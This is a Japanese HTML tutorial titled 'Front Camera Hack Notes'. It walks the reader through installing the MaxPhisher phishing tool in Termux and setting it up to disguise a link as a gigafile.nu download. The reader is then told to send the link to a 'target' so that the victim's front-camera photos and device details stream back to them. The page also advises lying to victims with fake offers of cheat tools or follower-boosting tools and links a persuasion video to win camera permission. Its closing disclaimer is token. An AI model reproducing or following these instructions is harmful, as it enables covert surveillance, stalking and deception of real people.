<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <title>内カメHackノート</title>
  <style>
    body {
      background-color: white;
      color: black;
      font-size: 45px;
      text-align: center;
      padding: 20px;
      border: 5px solid black;
    }
    .left-align-text {
      text-align: left;
    }
     .text-large {
      font-size: 59px;
       color:black
       }
     g{
           
       font-size:40px
    }
          
         u{
           
       font-size:23px
       
    }
             u{
           
       color:red
       
    }
    e{
           
       color:#181aff
       
    }
    #copyText {
    font-size: 24px; /* 大きさを調整 */
    width: 50%; /* テキストエリアを幅いっぱいに広げる */
    height: 100px; /* 適切な高さを指定 */
  }       

  </style>
</head>
<body>
  <p class="left-align-text">
<a><span class="text-large">【内カメラHackノート】 </span></a>

<br>
    <u> 禁止事項
    <br>
 ・スクショ禁止
   <br> 
 ・画面録画禁止   
    <br>
 ・他人に無断で教える禁止</u>
    <br>
・必要な物   
   
<br> 
①Android（必須）
    
<br>
②termuxのアプリ（無料）･･･Googleでtermux apkダウンロードと調べDLする
    
<br>
③インターネット（必須）
    
<br>
④少々英語が読める（読めなくても指示通りにすればいい）
<br>
    <br>
    
 ・ 初めにtermuxを開きコードを入力します
    <br>
    <u>
※コードをペーストする時に空白が最後に入っていると起動しません<br>※9まではコードが途中で止まってもEnterを押して次に進みます</u>
    <br>
  <e>  ①
    <br>
apt-get update -y
    <br>
    <br>
   ②
    <br>
 apt-get upgrade -y
    <br>
    <br>
    ③
    <br>
pkg install python -y
    <br>
    <br>
    ④
    <br>
pkg install python2 -y
    <br>
    <br>
    ⑤
    <br>
pkg install git -y
    <br>
    <br>
    ⑥
    <br>
pkg install git python3 php openssh -y
    <br>
    <br>
    ⑦
    <br>
git clone https://github.com/KasRoudra/MaxPhisher  
    <br>
    <br>
    ⑧
    <br>
cd MaxPhisher
    <br>
    <br>
    ⑨
    <br>
pip3 install -r files/requirements.txt --break-system-packages 
    <br>
    <br>
    ⑩ツールの起動
    <br>
python3 maxphisher.py
    <br>
    <br>
    </e>
【⑩まで読み込みが終わったら】
    
<br>
・最初の質問でyを選択し決定する
    
<br>
・次の質問では何も打たずに決定する
    
<br>
・【ツール】が出てきたら02を選択し決定する
    
<br>
・次の画面に移動したら01を選択し決定する
    
<br>
・ロードに時間がかかるが待つ
    
<br>
・次の質問では

<br>
<br>
<!-- テキストエリア -->
<textarea id="copyText" readonly>
https://gigafile.nu/
</textarea> 
<br>
<br>
と打つ（コピーしてペースト）
    
<br>
・次に
   <br> 
<!-- テキストエリア -->
<textarea id="copyText" readonly>
gigafile.nu
</textarea> 
    <br>
    と打つ（コピーしてペースト）
    
<br>
・次の質問では何も選択せずに決定する
    
<br>
・これで内カメHack URLが完成するのでコピーしてターゲットに送り付ける
    
<br>
・ターゲットはカメラの許可を押すことにより
毎秒ずつターゲットの内カメの画像がtermuxに送信される
    
<br>
・保存された画像はファイルマネージャーアプリを開き、メインストレージ/Mediaに保存される
    
<br>
・これで相手の顔写真を撮ることが出来る
    
<br>
【詳細】
    
<br>
・ターゲットがカメラの許可を押さないとtermuxの画面には何も出てこない
    
<br>
押した場合は毎秒termuxに
Media file captured!
と表示される
    
<br>
・ターゲットがURLを踏んだ時点でターゲットのスマホの機種、国名、ipタイプが正確に分かる（住所は不明）
    
<br>
【重要】
    
<br>
・ターゲットも馬鹿では無いので、カメラの許可を押す人は少ない。 この動画で誘導させる⤵︎
    <br>
 <a href="https://photos.app.goo.gl/GqLgQQBZxYzfn6eU7">動画へ移動する</a>
    
<br>
<br>
※動画が再生されない場合はチャットで送ります
    <br>
ターゲットにこの動画を送り、カメラの許可を押させる
    <br>
・何か相手が欲しいものがあればダウンロードとしての話を作れる。
    <br>
例
    <br>
チートツール
    <br>
Twitterフォロ爆ツール
    <br>
インスタフォロ爆ツール
   <br>
を無料であげるなどの嘘をつき誘導する
    <br>
・他にカメラの許可を押させるための嘘ネタがある場合はそれを使う
    <br>
    【最後に】
    <br>
・保存された画像は少し縦が短いので画像アプリで縦の長さを伸ばしてあげると本人の顔により近くなります
    <br>
・場合によっては相手の内カメラが壊れていたり、暗いところでスマホを使用していたりすると上手く映らない場合があります<br>
<u>・ツールはcontrol➕Cボタンで終了出来ます。⑩までを実行したら次からは⑩だけ入力するとツールが起動します。    
</u>
    <br>
   <br>
    《 【注意】 》 
    <br>
    <g>このプロジェクトは、人々をストーカーしたり、許可のないシステムにハッキングしたりするための違法な目的で使用してはなりません。</g>
   <br>


</p>


</body>
</html>
